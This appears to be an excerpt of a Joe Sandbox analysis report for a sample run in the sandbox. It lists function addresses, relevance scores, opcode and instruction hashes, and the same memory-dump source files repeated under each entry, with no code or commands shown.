          • Opcode ID: 24e9e657bff7cef4a6d5fce7e370d955ada8ce4cc307e8d2f00727d491f7595c
          • Instruction ID: 7e6ce1c8812e2705b63605ac64f4f98f3c0b54c6cd8767854b103a676b9a0385
          • Opcode Fuzzy Hash: 24e9e657bff7cef4a6d5fce7e370d955ada8ce4cc307e8d2f00727d491f7595c
          • Instruction Fuzzy Hash: 4B61C1B25187009FE345AE29DC8576EF7E5FF94720F1A882DE6C5C7290E6345441CB92
          Function 00248825 Relevance: .2, Instructions: 182COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 3472d71de3f8ca77a72720b20b189e9849d9aa74ebb2a6501004d6cf4e9cfd0d
          • Instruction ID: 4151afce9b09ab82f7941ca2988a693123a56fc7ecc99d9cde691ee05da1da55
          • Opcode Fuzzy Hash: 3472d71de3f8ca77a72720b20b189e9849d9aa74ebb2a6501004d6cf4e9cfd0d
          • Instruction Fuzzy Hash: AB5157B3A087045BE3146E3EDC4473AFBDAEBD0720F2A893DD9C887744E93559468686
          Function 002C6ECB Relevance: .2, Instructions: 166COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9126999ceed4819fa19c55a0bacf37fb96a989315f2d8d8cd34e6740720ff49b
          • Instruction ID: 951f79b636665d25ff6e02443b6965ceafa01300b1620cdba6b6988b25432586
          • Opcode Fuzzy Hash: 9126999ceed4819fa19c55a0bacf37fb96a989315f2d8d8cd34e6740720ff49b
          • Instruction Fuzzy Hash: D65136B36082089FD3186E68DC957BBF7D6EB94321F1A052DDBC583740E975A8048796
          Function 00161790 Relevance: .2, Instructions: 165COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6a3e5a2d56ef7ef7e17eae435d8c6b3eec342cdf1b8c866e842a7fdcee6fe756
          • Instruction ID: 2c16d5d1aeaf59aea9f89ba198d03e1a2e7e6a4ad670ac25f938d94ef31e1989
          • Opcode Fuzzy Hash: 6a3e5a2d56ef7ef7e17eae435d8c6b3eec342cdf1b8c866e842a7fdcee6fe756
          • Instruction Fuzzy Hash: A9416C31A09344AFD340AF78EC92A5B7BE8EB8A314F04883CFA49C7291D774D955C752
          Function 002BA942 Relevance: .1, Instructions: 134COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0782281c70b127e4dbbae23e398498c059cde66e17ebe6c7d279bfa63be7abc4
          • Instruction ID: 0c79ee6942a2d943735bb3c007cafc1c4a0cd2cf776dfaf1eb5846bc68775acd
          • Opcode Fuzzy Hash: 0782281c70b127e4dbbae23e398498c059cde66e17ebe6c7d279bfa63be7abc4
          • Instruction Fuzzy Hash: 2F412CF390C2045FE3085E2DED91B3AB7D6EBA0720F1A863DE9C587748ED3859054647
          Function 001727B0 Relevance: .1, Instructions: 126COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4a50e6fc031d13dc778682a9da9f56937090edd421863688b7fd81d8faabb513
          • Instruction ID: d7d301a4b1939dded0c68ebe8152cea2a32992f262cea55a8492305fdb6ff6bc
          • Opcode Fuzzy Hash: 4a50e6fc031d13dc778682a9da9f56937090edd421863688b7fd81d8faabb513
          • Instruction Fuzzy Hash: 44814FB450A3848FC374EF45DA886CBBBE1BB99708F904A1DD8886B754CFB01645CF96
          Function 001427D0 Relevance: .1, Instructions: 76COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7c7a9892b56ced29f223e94061505008cdc4b6dee798d26a74fab1ff0edfb4f4
          • Instruction ID: 06e0c3017851b66dedcf9ebdfa7127f15cda60e9a82d7d70a1e66f82c2d8188e
          • Opcode Fuzzy Hash: 7c7a9892b56ced29f223e94061505008cdc4b6dee798d26a74fab1ff0edfb4f4
          • Instruction Fuzzy Hash: FF11E377B2562247E751CE7AECD461B73D2EBCA310B5A0138FE41D7622CB36E981D290
          Function 0014BC9D Relevance: .0, Instructions: 31COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 28ca5e800123e3a28950c1f1ff5e01374e3291486f99c5395a6d0c97c030a752
          • Instruction ID: 22b510195c147752acc17af68f29cf0d022566fa0e1295323c6e49a738f16343
          • Opcode Fuzzy Hash: 28ca5e800123e3a28950c1f1ff5e01374e3291486f99c5395a6d0c97c030a752
          • Instruction Fuzzy Hash: EAF0277060C3809BD3188B34D8D163FBBF1EB83604F10551CE3C2C3292DB21C9028B09
          Function 0017B860 Relevance: .0, Instructions: 13COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d4c47674dd076e4731f390a8b8511d909db235368712465d53fd3d74604af304
          • Instruction ID: 0cb64a9b2b7bc88533d7670d3bda0c79dfa0c9984e09d99c972ade48e8a8c23c
          • Opcode Fuzzy Hash: d4c47674dd076e4731f390a8b8511d909db235368712465d53fd3d74604af304
          • Instruction Fuzzy Hash: 66B09260A04208BF00249E0A8C45D7BB6BE93CB640B106008B409A32188650EC0482F9